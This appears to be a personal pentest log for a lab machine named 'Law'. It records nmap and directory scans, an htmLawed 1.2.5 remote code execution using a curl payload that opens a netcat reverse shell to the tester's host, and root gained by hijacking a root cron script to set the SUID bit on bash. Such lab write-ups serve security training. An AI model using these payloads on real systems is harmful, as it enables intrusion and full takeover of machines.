Law
๐งช Pentest Log: {{date:2025-08-10}}
๐ Target Information
- Machine Name: Law
- IP Address: 192.168.187.190
- Operating System: Linux
ip=192.168.187.190
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Content Enumeration
htmLawed 1.2.5
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://www.exploit-db.com/exploits/52023
curl -s -d "sid=foo&hhook=exec&text=nc 192.168.45.163 80 -e /bin/bash" -b "sid=foo" http://$ip | egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
penelope -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: www-data
- Shell Type: reverse shell
๐ Enumeration
Scheduled Tasks:
./pspy64
found
2025/08/10 19:29:01 CMD: UID=0 PID=1051 | /bin/bash /var/www/cleanup.sh
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Scheduled Task Hijacking
- Target Binary/Service: cleanup.sh
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
vi /var/www/cleanup.sh
chmod +s /bin/bash
- Smash to root
bash -p